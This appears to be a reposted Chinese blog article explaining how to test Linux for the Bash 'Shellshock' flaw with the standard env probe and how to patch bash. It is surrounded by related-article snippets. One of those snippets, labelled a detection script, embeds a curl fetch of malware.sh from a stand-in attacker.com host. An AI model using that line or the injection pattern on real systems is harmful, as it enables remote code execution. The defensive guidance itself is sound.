检查你的系统系统是否有“Shellshock”漏洞并修复它

最新推荐文章于 2024-07-05 09:45:50 发布
最新推荐文章于 2024-07-05 09:45:50 发布
阅读量111 收藏
点赞数
文章标签: 操作系统 运维
原文链接:https://yq.aliyun.com/articles/85290
版权

检查你的系统系统是否有“Shellshock”漏洞并修复它

快速地向你展示如何检查你的系统是否受到Shellshock的影响,如果有,怎样修复你的系统免于被Bash漏洞利用

如果你正跟踪新闻,你可能已经听说过在Bash中发现了一个漏洞,这被称为Bash Bug或者** Shellshock**。红帽是第一个发现这个漏洞的机构。Shellshock错误允许攻击者注入自己的代码,从而使系统开放各给种恶意软件和远程攻击。事实上,黑客已经利用它来启动DDoS攻击

由于Bash在所有的类Unix系统中都有,如果这些都运行bash的特定版本,它会让所有的Linux系统都容易受到这种Shellshock错误的影响。

想知道如果你的Linux系统是否已经受到Shellshock影响?有一个简单的方法来检查它,这就是我们要看到的。

检查Linux系统的Shellshock漏洞

打开一个终端,在它运行以下命令:

 
  
  1.  env x='() { :;}; echo vulnerable' bash -c 'echo hello' 
 
  
如果你的系统没有漏洞,你会看到这样的输出:
 
  
 
  
  1.  bash: warning: x: ignoring function definition attempt 
  2.  bash: error importing function definition for `x’ 
  3. hello
 
  
如果你的系统有Shellshock漏洞,你会看到一个像这样的输出:
 
  
 
  
  1. vulnerable
  2. hello
 
  
您还可以通过使用下面的命令查看bash的版本:
 
  
 
  
  1.  bash --version 
 
  
如果bash的版本是3.2.51(1),你就应该更新了。
 
   
  
为有Shellshock漏洞的Linux系统打补丁
 
  
如果你运行的是基于Debian的Linux操作系统,如Ubuntu、Linux Mint的等,请使用以下命令升级Bash:
 
  
 
  
  1.  sudo apt-get update && sudo apt-get install --only-upgrade bash 
 
  
对于如Fedora,Red Hat,Cent OS等操作系统,请使用以下命令
 
  
 
  
  1.  yum -y update bash 
 
  
我希望这个小技巧可以帮助你,看看你是否受到Shellshock漏洞的影响并解决它。有任何问题和建议,欢迎来提。
 
  
原文发布时间:2014-10-06
 
  
本文来自云栖合作伙伴“linux中国”
 
 
 
 
 
  
 
 
 


                

        

        




    




    

      

        

            

              
                
                  weixin_34413065
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
详解ShellShock 漏洞复现原理,内附ShellShock修复方法

				
			

			

				

					Anprou的博客
				

				

					05-31
					
					6642
					
				

			

		

		

			
				
Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞,启动Bash的时候,它不但会导入这个函数,而且也会把函数定义后面的命令执行。

			
		

	



                

              
                



	

		

			

				
					
Shellshock(破壳)系列漏洞简要分析及检测

				
			

			

				

					Traxer的学习之路
				

				

					03-13
					
					4480
					
				

			

		

		

			
				
1.漏洞简介2.POC验证2.1 CVE 2014-6271最开始的shell测试脚本如下,主要的代码是第五行,它先使用env命令将() { :;}; echo vulnerable赋值给环境变量x,随后启动一个新的bash进程并执行命令echo test,并将错误信息重定向到null,再查找有无’vulnerable’这个字符串输出,如果输出成功则表示存在漏洞:#!/bin/bash
EXITCO

			
		

	



                


  
              

                


	

		

			

				
					
Shellshock漏洞回顾与分析测试

				
			

			

				

					xiaoshan812613234的专栏
				

				

					12-25
					
					1370
					
				

			

		

		

			
				
0x00 漏洞概述


很多人或许对2014上半年发生的安全问题“心脏流血”(Heartbleed Bug)事件记忆颇深,2014年9月,又出现了另外一个“毁灭级”的漏洞——Bash软件安全漏洞。这个漏洞由法国GNU/Linux爱好者Stéphane Chazelas所发现。随后,美国电脑应急响应中心(US-CERT)、红帽以及多家从事安全的公司于周三(北京时间2014年9月24日)发出警告

			
		

	





	

		

			

				
					
shell shock漏洞打补丁

				
			

			

				

					weixin_33670713的博客
				

				

					11-26
					
					113
					
				

			

		

		

			
				
主要针对Linux,Mac机器,先按如下步骤检查是否已经被“***”:http://www.linuxbrigade.com/bash...-find-youve-tested/First,sshintoyourserverandfindyourhttpaccesslogs.Somecommonplacesare:cPanel:/usr/...

			
		

	



		

			
		



	

		

			

				
					
linux shellshock漏洞,修复linux bash的ShellShock系列漏洞

				
			

			

				

					weixin_34515820的博客
				

				

					05-18
					
					224
					
				

			

		

		

			
				
检查是否linux bash的ShellShock系列漏洞ShellShock系列漏洞包含有CVE-2014-6271CVE-2014-7169CVE-2014-7186CVE-2014-7187CVE-2014-6277CVE-2014-6278检查是否ShellShock系列漏洞wget --no-check-certificate  https://github.com/hannob/...

			
		

	





	

		

			

				
					
linux系统存在漏洞怎么办,Linux_Linux系统下如何检测并修复bash中的破壳漏洞​​,问题:我想要知道我的Linux服 - phpStudy...

				
			

			

				

					weixin_30967451的博客
				

				

					05-19
					
					116
					
				

			

		

		

			
				
Linux系统下如何检测并修复bash中的破壳漏洞​​问题:我想要知道我的Linux服务器是否存在bash破壳漏洞,以及如何来保护我的Linux服务器不受破壳漏洞侵袭。2014年9月24日,一位名叫斯特凡·沙泽拉的安全研究者发现了一个名为“破壳”(Shellshock,也称为“bash门”或“Bash漏洞”)的bash漏洞。该漏洞如果被渗透,远程攻击者就可以在调用shell前通过在特别精心编制的环...

			
		

	





	

		

			

				
					
shellshock漏洞的redhat最新补丁及说明

				
			

			

				

					10-04
				

			

		

		

			
				
Shellshock漏洞,全称...总的来说,Shellshock漏洞是一个严重的安全隐患,及时安装Red Hat提供的补丁并遵循最佳安全实践是保护系统免受攻击的关键。理解补丁的工作原理和正确安装方法,对于保持系统的安全性至关重要。

			
		

	





	

		

			

				
					
BASH(破壳漏洞)Redhat系统检测和修补

				
			

			

				

					10-16
				

			

		

		

			
				
3. **运行检测脚本**: 可以使用特定的脚本来检查是否存在Shellshock漏洞。  ```  echo '() { x=`curl -s http://attacker.com/malware.sh` ; } ; echo vulnerable' > /tmp/test.sh  source /tmp/test.sh  if [ $? -...

			
		

	





	

		

			

				
					
SuSE Linux Enterprise Server 10.3 Bash漏洞修复方案(含升级tar包)

				
			

			

				

					09-29
				

			

		

		

			
				
【知识点详解】  本文主要涉及的是如何修复SuSE Linux Enterprise ...在处理此类安全问题时,及时更新系统组件并修复漏洞对于防止潜在的恶意攻击至关重要。此外,定期监控安全公告和更新是维护系统安全的基础实践。

			
		

	





	

		

			

				
					
Lab-03--Shellshock.zip

				
			

			

				

					12-22
				

			

		

		

			
				
针对Shellshock漏洞,有以下几个关键知识点:  1. **漏洞原理**:理解漏洞产生的原因,即bash shell在解析环境变量时,没有正确地限制命令执行,导致了代码注入的可能性。  2. **受影响系统**:确认你的系统是否使用...

			
		

	





	

		

			

				
					
redhat5.X、6.X BASH漏洞RPM补丁包(含教程)

				
			

			

				

					10-05
				

			

		

		

			
				
4. **验证安装**:安装完成后,重新启动系统或重新加载Bash进程以使更改生效,并再次运行检查命令,确保漏洞已被修复。 5. **系统重启**:在某些情况下,可能需要重启系统以完全应用补丁。  **系统升级经验**: 描述...

			
		

	





	

		

			

				
					
操作系统调度算法、页面置换算法总结

				
			

			

				

					m0_61636632的博客
				

				

					07-03
					
					938
					
				

			

		

		

			
				
FCFS:非抢占、先来先服务。对短进程不利。优先级调度算法:在支持抢占的系统中,当新进程进入就绪队列时,如果它的优先级高于当前运行进程的优先级,那么就会抢占CPU;在非抢占系统中,只是将新进程加入了就绪队列中。最短作业优先调度算法(SJF)选择处理时间最短的进程,如果时间相同则可以按照FCFS准则来处理它分为抢占式和非抢占式两种情况最高响应比优先调度算法(HRRN)轮转调度算法(RR)轮转()调度算法是一种基于抢占。

			
		

	





	

		

			

				
					
嵌入式Linux系统编程 — 5.7 Linux系统中proc文件系统

				
			

			

				

					几度春风里的博客
				

				

					07-01
					
					1093
					
				

			

		

		

			
				
proc文件系统,也称为进程信息文件系统(Process Information file system),是一种在 Linux 和其他类 Unix 系统中存在的虚拟文件系统。它被设计用来提供一种机制,允许用户空间访问内核空间的数据结构和信息。但是与普通文件不同的是, proc 文件系统是动态创建的,文件本身并不存在于磁盘当中、 只存在于内存当中,与 devfs 一样,都被称为虚拟文件系统

			
		

	





	

		

			

				
					
操作系统引导全过程-详细

				
			

			

				

					qq_58539881的博客
				

				

					07-03
					
					918
					
				

			

		

		

			
				
硬盘结构:硬盘内部有MBR(Master Boot Record主引导记录)、以及多个分区,每个主分区也有自己的PBR(分区引导记录)。硬盘扇区默认大小512B,空间分配一般按簇分配(多个扇区为一组簇)。BIOS工作在实模式下,最大20位寻址,也就是1M寻址范围(0x00000 ~ 0xFFFFF)(最初的8086处理器能够访问的内存最大只有1MB,保证兼容性)MBR大小512B,位于0柱面、0磁头、1扇区,包括:主引导程序(446B)、硬盘分区表DPT(64B)、MBR结束标志AA55(2B)

			
		

	





	

		

			

				
					
adb shell ps -T打印出来参数的含义,以及D,T,Z代表的状态含义是什么?

					
最新发布

				
			

			

				

					
				

				

					07-05
					
					350
					
				

			

		

		

			
				
在Android系统中,使用命令可以查看当前系统中运行的进程信息。当你添加-T选项时(注意,标准的ps命令在Android的adb shell中可能不直接支持-T选项,这通常与Linux中的ps命令略有不同),你可能是想查看更详细的线程信息,但标准的命令并不直接支持-T来列出线程。不过,我们可以讨论ps命令输出的一般含义以及进程状态(如D, T, Z)的含义。

			
		

	





	

		

			

				
					
Linux——/etc/passwd文件含义,grep,cut

				
			

			

				

					nianwan2157的博客
				

				

					06-30
					
					652
					
				

			

		

		

			
				
基于“行”的方式来提取数据是比较简单的,只需要设置好要搜索的关键词即可,但如果按列搜索,不仅要使用-f参数来设置需要看的列数,还需要使用-d参数来设置间隔符号。[root@server ~]# grep  -nv   "/sbin/nologin"   /etc/passwd (反向)grep  -r  h  ./*                  如果要明确搜索当前目录中的子目录有h的行。# 相当于 grep  -n  “/sbin/nologin”  /etc/passwd | wc  -l。

			
		

	





	

		

			

				
					
windows USB进行USB开发

				
			

			

				

					weixin_44245323的博客
				

				

					07-02
					
					533
					
				

			

		

		

			
				
/7//5//端点的方向性和端点号,如图11-11所示。//例如,地址值0x82指出该端点是一个端点号为2的IN端点,而0x02地//址指出一个端点号为2的OUT端点//端点类型//    USB_ENDPOINT_TYPE_CONTROL 0 控制端点//USB_ENDPOINT_TYPE_ISOCHRONOUS 1 等时端点//USB_ENDPOINT_TYPE_BULK 2 批量端点//USB_ENDPOINT_TYPE_INTERRUPT 3 中断端点。

			
		

	





	

		

			

				
					
shellshock漏洞利用

				
			

			

				

					04-03
				

			

		

		

			
				
Shellshock漏洞是一个存在于Bash(Unix和Linux操作系统的一种常用Shell)中的安全漏洞,它于2014年被公开。该漏洞允许攻击者通过构造恶意的环境变量来执行任意的命令,从而导致系统被入侵。  Shellshock漏洞的利用...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值